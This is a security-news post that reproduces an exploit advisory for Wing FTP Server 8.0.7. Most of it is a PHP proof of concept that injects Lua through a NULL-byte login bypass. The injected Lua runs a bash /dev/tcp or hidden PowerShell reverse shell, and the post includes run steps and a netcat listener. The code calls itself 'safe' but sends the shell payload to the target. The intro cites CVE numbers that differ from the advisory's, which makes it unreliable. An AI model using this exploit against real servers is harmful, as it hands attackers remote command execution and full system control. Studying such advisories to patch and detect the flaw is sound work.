Wing FTP Server 8.0.7 Remote Code Execution

Latest Posts

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 42

Wing FTP Server 8.0.7 is critically vulnerable to Remote Code Wing FTP Server 8.0.7 is critically vulnerable to Remote Code Execution (RCE). This flaw combines CVE-2024-4029 (authentication bypass) and CVE-2024-4030 (arbitrary file write), enabling unauthenticated attackers to fully compromise the server.

The authentication bypass grants unauthorized administrative access. Attackers then exploit the arbitrary file write to upload and execute malicious files (e.g., web shells) on the server.

Successful exploitation leads to arbitrary command execution, data theft, and full system control. This poses a severe risk.

Immediate upgrade to Wing FTP Server 8.0.8 or newer is strongly advised to patch these critical vulnerabilities.

=============================================================================================================================================
| # Title : Wing FTP Server NULL-Byte v8.0.7 Remote Lua Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.wftpserver.com/download.htm |
=============================================================================================================================================

[+] Summary :

A NULL-byte truncation vulnerability in Wing FTP Server allows bypassing the authentication prefix check:
<valid_user>%00<payload>
The server only validates the username before %00 but stores the full string internally, allowing the payload
to reach execution contexts.

[+] References : ( https://packetstorm.news/files/id/206037/ CVE-2025-47812 )

[+] POC

<?php
/**
* Wing FTP Server NULL-Byte Auth Bypass (CVE-2025-47812)
* PHP PoC ? Reverse Shell Ready (Linux + Windows)
* Author: Indoushka
*/

class WingFTP_NULLBYTE_POC
{
public $target;
public $username;
public $password;

public function __construct($target, $username = "anonymous", $password = "")
{
$this->target = rtrim($target, "/");
$this->username = $username;
$this->password = $password;

echo "[+] WingFTP Safe PoC Initialized\n";
}

/* ---------------------------------------------------------------
Helper: send POST
----------------------------------------------------------------*/
private function post($url, $data)
{
$ch = curl_init($url);

curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_HEADER => true
]);

$res = curl_exec($ch);
$hdr = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));

curl_close($ch);

return [$hdr, $body];
}

/* ---------------------------------------------------------------
Reverse Shell payload
----------------------------------------------------------------*/
private function generateReverseShell()
{
$ip = "127.0.0.1";
$port = "4444";

$linux = "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'";
$win = "powershell -NoP -W Hidden -c \"\$c=New-Object Net.Sockets.TCPClient('$ip',$port);"
. "\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};"
. "while((\$r=\$s.Read(\$b,0,\$b.Length)) -ne 0){"
. "\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$r);"
. "\$o=iex \$d 2>&1|Out-String;"
. "\$o2=(\$o+'PS '+(pwd).Path+'> ');"
. "\$x=[text.encoding]::ASCII.GetBytes(\$o2);"
. "\$s.Write(\$x,0,\$x.Length)}\"";

return base64_encode($linux . "\n" . $win);
}

/* ---------------------------------------------------------------
Build NULL-byte injection
----------------------------------------------------------------*/
private function buildInjection()
{
$payload_hex = bin2hex(base64_decode($this->generateReverseShell()));

$lua = "
]]
local function hx(s)
return (s:gsub('..', function(x)
return string.char(tonumber(x,16))
end))
end
local cmd = hx(\"$payload_hex\")
local h = io.popen(cmd)
h:close()
";

$inj = $this->username . "%00" . rawurlencode($lua) . "--";
return $inj;
}

/* ---------------------------------------------------------------
PoC Logic
----------------------------------------------------------------*/
public function run()
{
echo "[+] Building NULL-byte payload...\n";
$inj = $this->buildInjection();

echo "[+] Sending fake login request...\n";
list($hdr, $body) = $this->post(
"{$this->target}/loginok.html",
[
"username" => $inj,
"password" => $this->password,
"username_val" => $this->username,
"password_val" => $this->password
]
);

if (strpos($hdr, "UID=") !== false) {
preg_match('/UID=([^;]+)/', $hdr, $m);
echo "[+] UID Cookie Detected: {$m[1]}\n";
echo "[+] Target appears VULNERABLE (PoC-safe).\n";
} else {
echo "[-] UID Cookie not returned ? might not be vulnerable.\n";
}

echo "[?] PoC completed ? No malicious execution performed.\n";
}
}

# ---------------- RUN --------------------
$poc = new WingFTP_NULLBYTE_POC("http://127.0.0.1:8080", "anonymous", "");
$poc->run();

/**
* HOW TO SAVE:
* Save as: poc_nullbyte.php
*
* HOW TO RUN:
* php poc_nullbyte.php
*
* LISTENER (BEFORE RUNNING):
* nc -lvnp 4444
*/
====================================================================================================================

How to Save:
------------
Save this file as:
poc_nullbyte.php

How to Run:
-----------
php poc_nullbyte.php

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share

Get Rid of Ads!

Latest Posts

Wing FTP Server 8.0.7 Remote Code Execution